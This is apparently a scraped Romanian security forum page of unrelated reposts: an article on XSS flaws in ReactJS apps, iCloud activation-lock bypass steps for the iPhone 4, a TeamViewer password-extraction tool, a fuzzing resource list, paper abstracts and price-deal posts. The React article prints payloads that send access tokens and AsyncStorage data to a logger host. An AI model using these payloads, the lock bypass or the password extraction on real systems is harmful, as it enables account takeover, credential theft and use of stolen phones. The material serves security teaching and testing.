Leaderboard

Aici se vor posta doar oferte valabile gasite la diferite magazine online, din tara si nu numai. Rog a se posta atat link-ul cat si pretul. Ar fi indicat sa va asigurati ca produsul respectiv nu exista la un pret mai mic la un alt magazin, altfel ar fi inutil postul. Deasemenea, reducerea sa fie semnificativa, nu de-al de 3 lei 25.

Bernhard Mueller Uncertified Software Security Professional. Pwnie Winner ヽ(゜∇゜)ノ Aug 2 Exploiting Script Injection Flaws in ReactJS Apps ReactJS is a popular JavaScript library for building user interfaces. It enables client-rendered, “rich” web apps that load entirely upfront, allowing for a smoother user experience. Given that React apps implement a whole lot of client-side logic in JavaScript, it doesn’t seem far-fetched to assume that XSS-type attacks could be worthwhile. As it turns out, ReactJS is quite safe by design as long as it is used the way it’s meant to be used. For example, string variables in views are escaped automatically. However, as with all good things in life, it’s not impossible to mess things up. Script injection issues can result from bad programming practices including the following: Creating React components from user-supplied objects; Rendering links with user-supplied href attributes, or other HTML tags with injectable attributes (link tag, HMTL5 imports); Explicitly setting the dangerouslySetInnerHTML prop of an element; Passing user-supplied strings to eval(). In a world ruled by Murphy’s law, all of this is guaranteed to happen, so let’s have a closer look. Components, Props and Elements Components are the basic building block of ReactJS. Conceptually, they are like JavaScript functions. They accept arbitrary inputs (“props”) and return React elements describing what should appear on the screen. A basic component looks as follows: class Welcome extends React.Component { render() { return <h1>Hello, {this.props.name}</h1>; } } Note the weird syntax in the return statement: This is JSX, a syntax extension to JavaScript. During the build process, the JSX code is transpiledto regular JavaScript (ES5) code. The following two examples are identical: // JSX const element = ( <h1 className=”greeting”> Hello, world! </h1> ); // Transpiled to createElement() call const element = React.createElement( ‘h1’, {className: ‘greeting’}, ‘Hello, world!’ ); New React elements are created from component classes using the createElement() function: React.createElement( type, [props], [...children] ) This function takes three arguments: type can be either a tag name string (such as 'div' or 'span'), or a component class. In React Native, only component classes are allowed. props contains a list of attributes passed to the new element. children contains the child node(s) of the new element (which, in turn, are more React components). Several attack vectors exist if you can control any of those arguments. Injecting Child Nodes In March 2015, Daniel LeCheminant reported a stored cross-site scripting vulnerability in HackerOne. The issue was caused by the HackerOne web app passing an arbitrary, user-supplied object as the children argument to React.createElement(). Presumably, the vulnerable code must have looked somewhat like the following: /* Retrieve a user-supplied, stored value from the server and parsed it as JSON for whatever reason. attacker_supplied_value = JSON.parse(some_user_input) */ render() { return <span>{attacker_supplied_value}</span>; } This JSX would translate to the following JavaScript: React.createElement("span", null, attacker_supplied_value}; When attacker_supplied_value was a string as expected, this would produce a regular span element. However, the createElement() function in the then-current version of ReactJS would also accept plain objects passed as children. Daniel exploited the issue by supplying a JSON-encoded object. He included the dangerouslySetInnerHTML prop, allowing him to insert raw HTML into the output rendered by React. His final proof-of-concept looked as follows: { _isReactElement: true, _store: {}, type: “body”, props: { dangerouslySetInnerHTML: { __html: "<h1>Arbitrary HTML</h1> <script>alert(‘No CSP Support :(‘)</script> <a href=’http://danlec.com'>link</a>" } } } Following Daniel’s blog post, potential mitigations were discussed on the React.js GitHub. In November 2015, Sebastian Markbåge commited a fix: React elements were now tagged with the attribute$$typeof: Symbol.for('react.element'). Because there is no way to reference a global JavaScript symbol from an injected object, Daniel’s technique of injecting child elements can’t be used anymore. Controlling Element Type Even though plain objects are no longer work as ReactJS elements, component injection still isn’t completely impossible, because createElementalso accepts strings in the type argument. Suppose a developer did something like this: // Dynamically create an element from a string stored in the backend. element_name = stored_value; React.createElement(element_name, null); If stored_valuewas an attacker-controlled string, it would be possible to create an arbitrary React component. However, this would result only in a plain, attribute-less HTML element (i.e. pretty useless to the attacker). To do something useful, one must be able to control the properties of the newly created element. Injecting Props Consider the following code: // Parse attacker-supplied JSON for some reason and pass // the resulting object as props. // Don't do this at home unless you are a trained expert! attacker_props = JSON.parse(stored_value) React.createElement("span", attacker_props}; Here, we can inject arbitrary props into the new element. We could use the following payload to set the dangerouslySetInnerHTML property: {"dangerouslySetInnerHTML" : { "__html": "<img src=x/ onerror=’alert(localStorage.access_token)’>"}} Classical XSS Some traditional XSS vectors are also viable in ReactJS apps. Look out for the following anti-patterns: Explicitly Setting dangerouslySetInnerHTML Developers may choose to set the dangerouslySetInnerHTML prop on purpose. <div dangerouslySetInnerHTML={user_supplied} /> Obviously, if you control the value of that prop, you can insert any JavaScript your heart desires. Injectable Attributes If you control the href attribute of a dynamically generated a tag, there’s nothing to prevent you from injection a javascript: URL. Some other attributes such as formaction in HTML5 buttons also work in modern browser. <a href={userinput}>Link</a> <button form="name" formaction={userinput}> Another exotic injection vector that would work in modern browsers are HTML5 imports: <link rel=”import” href={user_supplied}> Server-Side Rendered HTML To improve initial page load times, there has lately been a trend towards pre-rendering React.JS pages on the server (“server-side rendering”). In November 2016, Emilia Smith pointed out that the official Redux code sample for SSR resulted in a cross-site scripting vulnerability, because the client state was concatenated into the pre-rendered page without escaping (the sample code has since been fixed). The take-away: If HTML is pre-rendered on the server-side, you might see the same types of XSS issues found in “regular” web apps. Eval-based injection If the app uses eval() to dynamically execute an injectable string under your control, you have hit the jackpot. In that case, you may proceed to inject arbitrary code of your choosing. function antiPattern() { eval(this.state.attacker_supplied); } XSS Payload In the modern world, session cookies are as outdated as manual typewriters and McGyver-style mullets. The agile developer of today uses stateless session tokens, elegantly saved in client-side local storage. Consequently, hackers must adapt their payloads accordingly. When exploiting an XSS attack a ReactJS web app, you could inject something along the following lines to retrieve an access token from local storage and sent it to your logger: fetch(‘http://example.com/logger.php?token='+localStorage.access_token); How About React Native? React Native is a mobile app framework that allows you to build nativemobile applications using ReactJS. More specifically, it provides you with a runtime that can run React JavaScript bundles on mobile devices. In true Inception style, you can “port” a React Native App to work in regular web browsers using React Native for Web (web app in a mobile app in a web app). This means that you build apps from Android, iOS and Desktop browser from a single code base. From what I’ve seen so far, most of the script injection vectors mentioned above don’t work in React Native: React Native’s createInternalComponent method only accepts tagged component classes, so even if you fully control the arguments to createElement() you can’t create arbitrary elements; HTML elements don’t exist, and HTML isn’t parsed, so typical browser-based XSS vectors (e.g. href) can’t be used. Only the eval() based variant seems to be exploitable on mobile devices. If you do get JavaScript code injected through eval(), you can access React Native APIs and do interesting things. For example, you could steal all the data from local storage (AsyncStorage) by doing something like: _reactNative.AsyncStorage.getAllKeys(function(err,result){_reactNative.AsyncStorage.multiGet(result,function(err,result){fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); TL;DR Even though ReactJS is quite safe by design, it’s not impossible to mess things up. Bad programming practices can lead to exploitable security vulnerabilities. Security Testers: Inject JavaScript and JSON wherever you can and see what happens. Developers: Don’t ever useeval() or dangerouslySetInnerHTML. Avoid parsing user-supplied JSON. React Security Application Security Hacking Penetration Testing Bernhard Mueller Uncertified Software Security Professional. Pwnie Winner ヽ(゜∇゜)ノ Sursa: https://medium.com/@muellerberndt/exploiting-script-injection-flaws-in-reactjs-883fb1fe36c1

1. Download and install Java Development Kit 2. Download and extract GW_iCloud_Bypass 3. Put your iPhone 4 into DFU mode 4. Start SSH.jar and wait until you see Success! written with green in the log there, also the iPhone will show the Apple logo with a grey horizontal line on its sreen 5. Open WinSCP and input, host name 127.0.0.1, port 2022, username root, password alpine and press login 6. In WinSCP look for Terminal and open it, then execute command mount.sh, make sure the terminal says "Mounting /dev/disk0s1s1 on /mnt1" and “Mounting /dev/disk0s1s2 on /mnt2" then close Terminal. 7. In WinSCP right explorer pane, navigate to /Mnt1/Applications and delete Setup.app folder 8. Close WinSCP and SSH.jar and hard reset your iPhone 4 by holding home and power buttons until the screen goes black and release the buttons 9. Open TinyUmbrella and wait for your iPhone 4 to show as a recovery device (weird name), click on it and click exit recovery, your iPhone4 should boot normally into the homescreen

Some of the most notable machine learning tools can be hijacked in order to create super-powerful malware capable of bypassing most anti-virus systems, researchers have claimed. At the recent DEF CON event, security company Endgame revealed how it created customized malware using Elon Musk's own OpenAI framework that security engines were unable to detect. Endgame's research was based around taking binaries that appeared to be malicious, and by changing a few parts, that code could appear benign to antivirus engines. The company's technical director of data science, Hyrum Anderson, highlighted that even changing some small details could allow it to bypass AV engines and explained how machine learning models could be hijacked by hackers, saying, "All machine learning models have blind spots. Depending on how much knowledge a hacker has they can be convenient to exploit." Endgame's team disguised known malicious software to evade next-gen AV. It monitored the responses they received from the engine and through this it was able to make many small tweaks that allowed it to become even more proficient at developing malware capable of evading security sensors. Over the course of 15 hours and 100,000 of training, the software attempted to learn the blind spots of the next-gen antivirus scanner. In total Endgame was successful in getting 16 percent of its sample malware code past the security system. Anderson informed attendees that the malware generating software would be available online at Endgame's Github page and he encouraged others to try it out. Sursa Github page - cred ca asta este

Welcome to Awesome Fuzzing A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. Table of Contents Books Courses Free Paid Videos NYU Poly Course videos Conference talks and tutorials Tutorials and Blogs Tools File Format Fuzzers Network Protocol Fuzzers Taint Analysis Symbolic Execution SAT and SMT Solvers Essential Tools Vulnerable Applications Anti-Fuzzing Contributing Awesome Fuzzing Resources Books Books on fuzzing Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini. Fuzzing for Software Security Testing and Quality Assurance by Ari Takanen, Charles Miller, and Jared D Demott. Open Source Fuzzing Tools by by Gadi Evron and Noam Rathaus. Gray Hat Python by Justin Seitz. Note: Chapter(s) in the following books are dedicated to fuzzing. The Shellcoder's Handbook: Discovering and Exploiting Security Holes ( Chapter 15 ) by Chris Anley, Dave Aitel, David Litchfield and others. iOS Hacker's Handbook - Chapter 1 Charles Miller, Dino DaiZovi, Dion Blazakis, Ralf-Philip Weinmann, and Stefan Esser. IDA Pro - The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler Courses Courses/Training videos on fuzzing Free NYU Poly ( see videos for more ) - Made available freely by Dan Guido. Samclass.info ( check projects section and chapter 17 ) - by Sam. Modern Binary Exploitation ( RPISEC ) - Chapter 15 - by RPISEC. Offensive Computer Security - Week 6 - by W. Owen Redwood and Prof. Xiuwen Liu. Paid Offensive Security, Cracking The Perimeter ( CTP ) and Advanced Windows Exploitation ( AWE ) SANS 660/760 Advanced Exploit Development for Penetration Testers Exodus Intelligence - Vulnerability development master class Videos Videos talking about fuzzing techniques, tools and best practices NYU Poly Course videos Fuzzing 101 (Part 1) - by Mike Zusman. Fuzzing 101 (Part 2) - by Mike Zusman. Fuzzing 101 (2009) - by Mike Zusman. Fuzzing - Software Security Course on Coursera - by University of Maryland. Conference talks and tutorials Youtube Playlist of various fuzzing talks and presentations - Lots of good content in these videos. Browser bug hunting - Memoirs of a last man standing - by Atte Kettunen Coverage-based Greybox Fuzzing as Markov Chain Tutorials and Blogs Tutorials and blogs which explain methodology, techniques and best practices of fuzzing [2016 articles] Effective File Format Fuzzing - Mateusz “j00ru” Jurczyk @ Black Hat Europe 2016, London A year of Windows kernel font fuzzing Part-1 the results - Amazing article by Google's Project Zero, describing what it takes to do fuzzing and create fuzzers. A year of Windows kernel font fuzzing Part-2 the techniques - Amazing article by Google's Project Zero, describing what it takes to do fuzzing and create fuzzers. Interesting bugs and resources at fuzzing project - by fuzzing-project.org. Fuzzing workflows; a fuzz job from start to finish - by @BrandonPrry. A gentle introduction to fuzzing C++ code with AFL and libFuzzer - by Jeff Trull. A 15 minute introduction to fuzzing - by folks at MWR Security. Note: Folks at fuzzing.info has done a great job of collecting some awesome links, I'm not going to duplicate their work. I will add papers missed by them and from 2015 and 2016. Fuzzing Papers - by fuzzing.info Fuzzing Blogs - by fuzzing.info Root Cause Analysis of the Crash during Fuzzing - by Corelan Team. Root cause analysis of integer flow - by Corelan Team. Creating custom peach fuzzer publishers - by Open Security Research 7 Things to Consider Before Fuzzing a Large Open Source Project - by Emily Ratliff. From Fuzzing to Exploit: From fuzzing to 0-day - by Harold Rodriguez(@superkojiman). From crash to exploit - by Corelan Team. Peach Fuzzer related tutorials Getting Started with Peach Fuzzing with Peach Part 1 - by Jason Kratzer of corelan team Fuzzing with Peach Part 2 - by Jason Kratzer of corelan team. Auto generation of Peach pit files/fuzzers - by Frédéric Guihéry, Georges Bossert. AFL Fuzzer related tutorials Fuzzing workflows; a fuzz job from start to finish - by @BrandonPrry. Fuzzing capstone using AFL persistent mode - by @toasted_flakes RAM disks and saving your SSD from AFL Fuzzing Bug Hunting with American Fuzzy Lop Advanced usage of American Fuzzy Lop with real world examples Segfaulting Python with afl-fuzz Fuzzing Perl: A Tale of Two American Fuzzy Lops Fuzzing With AFL-Fuzz, a Practical Example ( AFL vs Binutils ) The Importance of Fuzzing...Emulators? How Heartbleed could've been found Filesystem Fuzzing with American Fuzzy lop Fuzzing Perl/XS modules with AFL How to fuzz a server with American Fuzzy Lop - by Jonathan Foote libFuzzer Fuzzer related tutorials libFuzzer Tutorial libFuzzer Workshop: "Modern fuzzing of C/C++ Projects" Spike Fuzzer related tutorials Fuzzing with Spike to find overflows Fuzzing with Spike - by samclass.info FOE Fuzzer related tutorials Fuzzing with FOE - by Samclass.info SMT/SAT solver tutorials Z3 - A guide - Getting Started with Z3: A Guide Tools Tools which helps in fuzzing applications File Format Fuzzers Fuzzers which helps in fuzzing file formats like pdf, mp3, swf etc., MiniFuzz - Basic file format fuzzing tool by Microsoft. BFF from CERT - Basic Fuzzing Framework for file formats. AFL Fuzzer (Linux only) - American Fuzzy Lop Fuzzer by Michal Zalewski aka lcamtuf Win AFL - A fork of AFL for fuzzing Windows binaries by Ivan Fratic Shellphish Fuzzer - A Python interface to AFL, allowing for easy injection of testcases and other functionality. TriforceAFL - A modified version of AFL that supports fuzzing for applications whose source code not available. Peach Fuzzer - Framework which helps to create custom dumb and smart fuzzers. MozPeach - A fork of peach 2.7 by Mozilla Security. Failure Observation Engine (FOE) - mutational file-based fuzz testing tool for windows applications. rmadair - mutation based file fuzzer that uses PyDBG to monitor for signals of interest. honggfuzz - A general-purpose, easy-to-use fuzzer with interesting analysis options. Supports feedback-driven fuzzing based on code coverage. Supports GNU/Linux, FreeBSD, Mac OSX and Android. zzuf - A transparent application input fuzzer. It works by intercepting file operations and changing random bits in the program's input. radamsa - A general purpose fuzzer and test case generator. binspector - A binary format analysis and fuzzing tool Network Protocol Fuzzers Fuzzers which helps in fuzzing applications which use network based protocals like HTTP, SSH, SMTP etc., Peach Fuzzer - Framework which helps to create custom dumb and smart fuzzers. Sulley - A fuzzer development and fuzz testing framework consisting of multiple extensible components by Michael Sutton. boofuzz - A fork and successor of Sulley framework. Spike - A fuzzer development framework like sulley, a predecessor of sulley. Metasploit Framework - A framework which contains some fuzzing capabilities via Auxiliary modules. Nightmare - A distributed fuzzing testing suite with web administration, supports fuzzing using network protocols. rage_fuzzer - A dumb protocol-unaware packet fuzzer/replayer. Misc Other notable fuzzers like Kernel Fuzzers, general purpose fuzzer etc., KernelFuzzer - Cross Platform Kernel Fuzzer Framework. honggfuzz - A general-purpose, easy-to-use fuzzer with interesting analysis options. Hodor Fuzzer - Yet Another general purpose fuzzer. libFuzzer - In-process, coverage-guided, evolutionary fuzzing engine for targets written in C/C++. syzkaller - Distributed, unsupervised, coverage-guided Linux syscall fuzzer. ansvif - An advanced cross platform fuzzing framework designed to find vulnerabilities in C/C++ code. Taint Analysis How user input affects the execution PANDA ( Platform for Architecture-Neutral Dynamic Analysis ) QIRA (QEMU Interactive Runtime Analyser) Symbolic Execution SAT and SMT Solvers Z3 - A theorem prover from Microsoft Research. SMT-LIB - An international initiative aimed at facilitating research and development in Satisfiability Modulo Theories (SMT) References I haven't included some of the legends like AxMan, please refer the following link for more information.https://www.ee.oulu.fi/research/ouspg/Fuzzers Essential Tools Tools of the trade for exploit developers, reverse engineers Debuggers Windbg - The preferred debugger by exploit writers. Immunity Debugger - Immunity Debugger by Immunity Sec. OllyDbg - The debugger of choice by reverse engineers and exploit writers alike. Mona.py ( Plugin for windbg and Immunity dbg ) - Awesome tools that makes life easy for exploit developers. x64dbg - An open-source x64/x32 debugger for windows. Evan's Debugger (EDB) - Front end for gdb. GDB - Gnu Debugger - The favorite linux debugger. PEDA - Python Exploit Development Assistance for GDB. Radare2 - Framework for reverse-engineering and analyzing binaries. Disassemblers and some more Dissemblers, disassembly frameworks etc., IDA Pro - The best disassembler binnavi - Binary analysis IDE, annotates control flow graphs and call graphs of disassembled code. Capstone - Capstone is a lightweight multi-platform, multi-architecture disassembly framework. Others ltrace - Intercepts library calls strace - Intercepts system calls Vulnerable Applications Exploit-DB - https://www.exploit-db.com (search and pick the exploits, which have respective apps available for download, reproduce the exploit by using fuzzer of your choice) PacketStorm - https://packetstormsecurity.com/files/tags/exploit/ Fuzzgoat - Vulnerable C program for testing fuzzers. Samples files for seeding during fuzzing: https://files.fuzzing-project.org/ PDF Test Corpus from Mozilla MS Office file format documentation Fuzzer Test Suite - Set of tests for fuzzing engines. Includes different well-known bugs such as Heartbleed, c-ares $100K bug and others. Anti Fuzzing Introduction to Anti-Fuzzing: A Defence In-Depth Aid Contributing Please refer the guidelines at contributing.md for details. Thanks to the following folks who made contributions to this project. Tim Strazzere jksecurity Sursa: https://github.com/secfigo/Awesome-Fuzzing/blob/master/README.md

KEVM: A Complete Semantics of the Ethereum Virtual Machine Everett Hildenbrandt (UIUC), Manasvi Saxena (UIUC), Xiaoran Zhu (UIUC), Nishant Rodrigues (UIUC), Philip Daian (Cornell Tech, IC3, and RV Inc.), Dwight Guth (RV Inc.), and Grigore Ro¸su (UIUC and RV Inc.) August 1, 2017 Abstract A developing field of interest for the distributed systems and applied cryptography community is that of smart contracts: self-executing financial instruments that synchronize their state, often through a blockchain. One such smart contract system that has seen widespread practical adoption is Ethereum, which has grown to secure approximately 30 billion USD of currency value and in excess of 300,000 daily transactions. Unfortunately, the rise of these technologies has been marred by a repeated series of security vulnerabilities and high profile contract failures. To address these failures, the Ethereum community has turned to formal verification and program analysis which show great promise due to the computational simplicity and boundedtime execution inherent to smart contracts. Despite this, no fully formal, rigorous, comprehensive, and executable semantics of the EVM (Ethereum Virtual Machine) currently exists, leaving a lack of rigor on which to base such tools. In this work, we present KEVM, the first fully executable formal semantics of the EVM, the bytecode language in which smart contracts are executed. We create this semantics in a framework for executable semantics, the K framework. We show that our semantics not only passes the official 40,683-test stress test suite for EVM implementations, but also reveals ambiguities and potential sources of error in the existing on-paper formalization of EVM semantics [45] on which our work is based. These properties make KEVM an ideal formal reference implementation against which other implementations can be evaluated. We proceed to argue for a semantics-first formal verification approach for EVM contracts, and demonstrate its practicality by using KEVM to verify practically important properties over the arithmetic operation of an example smart contract and the correct operation of a token transfer function in a second contract. We show that our approach is feasible and not computationally restrictive. We hope that our work serves as the base for the development of a wide range of useful formally derived tools for Ethereum, including model checkers, certified compilers, and program equivalence checkers. Link: https://www.ideals.illinois.edu/handle/2142/97207

Extract password from TeamViewer memory using Frida Hi there, in this article we want to tell about our little research about password security in TeamViewer. The method can help during the pentest time for post exploitation to get access to another machine using TeamViewer. TeamViewer automatically authentication A few days ago I worked on my windows cloud VPS with TeamViewer (where I set a custom password). After work I disconnected, at the next time when I wanted to connect, I saw that TeamViewer had auto-filled the password. I think “Interesting, how can i get access to the password? How is the password stored in my computer?” Password location I dumped the memory of the TeamViewer and grepped password. Ooo yeees, 😊 password in the memory is stored in Unicode format. It turns out that if you finish work with TeamViewer and don’t kill the process (or exit from TeamViewer the password will be stored in memory) After analyzing we understood that the first red area is a start magic data, in the second one – end magic data (from time to time, end magic data has this value = 00 00 00 20 00 00). Script for getting password To extract passwords from memory we wrote two mini programs, in Python and C++ language. Thx Frida team for a wonderful tool! Our python script attaches to the TeamViewer.exe process, gets the base address and memory size of each library in this process. After that, it dumps one by one memory area, searches parts with [00 88] bytes at the start and [00 00 00] bytes in the end and copies them in the array. The next and the last step is choosing end decoding raws according to the regexp and password policy. After executing the C++ code, you will get this view “asdQWE123” is the password For the future The programs can extract well remote ID and passwords, but he also gets some false positive dates. If we will have free time, we will try to reduce false positive rates. Optimize C++ code from https://github.com/vah13/extractTVpasswords examples c++ example python example @NewFranny @vah_13 Sursa: https://github.com/vah13/extractTVpasswords

Stai ca vorbim in dodii acum... Cine ? Am plecat de la a nu putea sa joci pe bwin din RO si am ajuns la discutii ezoterice. Cand accesezi un website, sa zicem www.example.com, au loc urmatoarele evenimente: Se face un query DNS pentru inregistrarile de tip A sau AAAA (adica IPv4 sau IPv6) pentru www.example.com catre server-ul/server-ele DNS setate in PC; daca oricare din ele stiu raspunsul, sari la pasul 5; altfel intrebi serverele DNS radacina (domeniile sunt o structura aborescenta: exista un numar predeterminat de servere radacina ce contin adresele serverelor DNS ce administreaza diferitele Top Level Domain); comunicatiile DNS se fac pe portul 53 UDP (sau TCP) Server-ul radacina va raspunde ca nu stie ce adresa are www.example.com dar stie ca toate domeniile .com sunt administrate de urmatoarele servere, asa ca intreaba acolo. Server-ul .com va raspunde ca nu stie adresa, dar stie ca example.com e administrat de urmatoarele servere, asa ca intreaba acolo Server-ul example.com va da adresele cerute pentru www.example.com. Browserul va deschide o conexiune TCP la adresa primita de la server-ul DNS pe portul 80 (daca vorbim de http; daca folosim https, portul implicit este 443) Dupa ce conexiunea este deschisa, va trimite un request GET pentru a primi continutul paginii marcate in configuratia webserver-ului ca index. Dupa ce primeste continutul paginii respective, analizeaza pagina si vede ce resurse sunt necesare si reia procesul pentru fiecare resursa. Acum, daca vorbim de o persoana ce iti intercepteaza traficul (sa zicem traficul wireless), atunci da, acea persoana poate vedea ce website-uri accesezi urmarind ce domenii cauta pc-ul. Dar am pornit de la problema identificarii browser-ului de catre un website, atunci cand schimbi IP-ul. Ceea ce nu se poate realiza cu ajutorul DNS-ului.

Cracking the Lens: Targeting HTTP's Hidden Attack Surface James Kettle - james.kettle@portswigger.net - @albinowax Modern websites are browsed through a lens of transparent systems built to enhance performance, extract analytics and supply numerous additional services. This almost invisible attack surface has been largely overlooked for years. In this paper, I'll show how to use malformed requests and esoteric headers to coax these systems into revealing themselves and opening gateways into our victim's networks. I'll share how by combining these techniques with a little Bash I was able to thoroughly perforate DoD networks, trivially earn over $30k in vulnerability bounties, and accidentally exploit my own ISP. While deconstructing the damage, I'll also showcase several hidden systems it unveiled, including not only covert request interception by the UK's largest ISP, but a substantially more suspicious Colombian ISP, a confused Tor backend, and a system that enabled reflected XSS to be escalated into SSRF. You'll also learn strategies to unblinker blind SSRF using exploit chains and caching mechanisms. Finally, to further drag these systems out into the light, I'll release Collaborator Everywhere - an open source Burp Suite extension which augments your web traffic with a selection of the best techniques to harvest leads from cooperative websites. Outline Introduction Methodology Listening Research Pipeline Scaling Up Misrouting Requests Invalid Host Investigating Intent - BT Investigating Intent - Metrotel Input Permutation Host Override Ambiguous Requests Breaking Expectations Tunnels Targeting Auxiliary Systems Gathering Information Remote Client Exploits Preemptive Caching Conclusion Download: https://www.blackhat.com/docs/us-17/wednesday/us-17-Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-wp.pdf

PM me in legatura cu site 3, pret si statistici google. Stiu ca vrei sa iti faca lumea oferte, dar e marfa ta, tu stii ce vinzi, ar trebui sa stii cat vrei sa scoti pe ele.

Nu stiam. Am mai gasit si asta: http://www.domo.ro/laptop-laptopuri/apple-macbook-pro-15-retina-i7-3.4ghz-256gb-16gb-intel-iris-pro-int-pMyAxMj0p-l/ Pe iStyle si iCenter e 10000 RON, aici e 9000 RON. Probabil sunt si multe reduceri false, dar astea le pot confirma ca m-am uitat recent de ele si erau la preturile de care vorbesc.